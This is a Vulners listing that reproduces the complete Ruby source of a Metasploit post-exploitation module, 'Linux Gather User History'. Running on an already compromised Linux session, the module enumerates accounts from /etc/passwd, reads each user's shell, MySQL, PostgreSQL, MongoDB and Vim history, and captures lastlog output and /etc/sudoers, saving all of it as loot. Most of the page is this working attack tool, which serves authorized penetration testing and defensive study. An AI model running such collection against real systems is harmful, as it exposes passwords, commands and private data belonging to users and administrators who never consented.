Lucene search
K

Linux Gather User History

🗓️ 14 Mar 2012 16:44:03Reported by ohdae <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 30 Views

This module gathers shell history, MySQL history, PostgreSQL history, MongoDB history, Vim history, lastlog, and sudoers from Linux user accounts

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Linux::System

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Linux Gather User History',
        'Description' => %q{
          This module gathers the following user-specific information:
          shell history, MySQL history, PostgreSQL history, MongoDB history,
          Vim history, lastlog, and sudoers.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          # based largely on get_bash_history function by Stephen Haywood
          'ohdae <bindshell[at]live.com>'
        ],
        'Platform' => ['linux'],
        'SessionTypes' => ['shell', 'meterpreter']
      )
    )
  end

  def run
    distro = get_sysinfo

    print_good('Info:')
    print_good("\t#{distro[:version]}")
    print_good("\t#{distro[:kernel]}")

    user = execute('/usr/bin/whoami')
    users = execute('/bin/cat /etc/passwd | cut -d : -f 1').chomp.split
    users = [user] if user != 'root' || users.blank?

    vprint_status("Retrieving history for #{users.length} users")
    shells = %w[ash bash csh ksh sh tcsh zsh]
    users.each do |u|
      home = get_home_dir(u)
      shells.each do |shell|
        get_shell_history(u, home, shell)
      end
      get_mysql_history(u, home)
      get_psql_history(u, home)
      get_mongodb_history(u, home)
      get_vim_history(u, home)
    end

    last = execute('/usr/bin/last && /usr/bin/lastlog')
    sudoers = cat_file('/etc/sudoers')
    save('Last logs', last) unless last.blank?
    save('Sudoers', sudoers) unless sudoers.blank? || sudoers =~ /Permission denied/
  end

  def save(msg, data, ctype = 'text/plain')
    ltype = 'linux.enum.users'
    loot = store_loot(ltype, ctype, session, data, nil, msg)
    print_good("#{msg} stored in #{loot}")
  end

  def execute(cmd)
    vprint_status("Execute: #{cmd}")
    output = cmd_exec(cmd)
    output
  end

  def cat_file(filename)
    vprint_status("Download: #{filename}")
    output = read_file(filename)
    output
  end

  def get_home_dir(user)
    home = execute("echo ~#{user}")
    if home.empty?
      if user == 'root'
        home = '/root'
      else
        home = "/home/#{user}"
      end
    end
    home
  end

  def get_shell_history(user, home, shell)
    vprint_status("Extracting #{shell} history for #{user}")
    hist = cat_file("#{home}/.#{shell}_history")
    save("#{shell} history for #{user}", hist) unless hist.blank? || hist =~ /No such file or directory/
  end

  def get_mysql_history(user, home)
    vprint_status("Extracting MySQL history for #{user}")
    sql_hist = cat_file("#{home}/.mysql_history")
    save("MySQL history for #{user}", sql_hist) unless sql_hist.blank? || sql_hist =~ /No such file or directory/
  end

  def get_psql_history(user, home)
    vprint_status("Extracting PostgreSQL history for #{user}")
    sql_hist = cat_file("#{home}/.psql_history")
    save("PostgreSQL history for #{user}", sql_hist) unless sql_hist.blank? || sql_hist =~ /No such file or directory/
  end

  def get_mongodb_history(user, home)
    vprint_status("Extracting MongoDB history for #{user}")
    sql_hist = cat_file("#{home}/.dbshell")
    save("MongoDB history for #{user}", sql_hist) unless sql_hist.blank? || sql_hist =~ /No such file or directory/
  end

  def get_vim_history(user, home)
    vprint_status("Extracting Vim history for #{user}")
    vim_hist = cat_file("#{home}/.viminfo")
    save("Vim history for #{user}", vim_hist) unless vim_hist.blank? || vim_hist =~ /No such file or directory/
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

08 Feb 2023 13:47Current
7.3High risk
Vulners AI Score7.3
30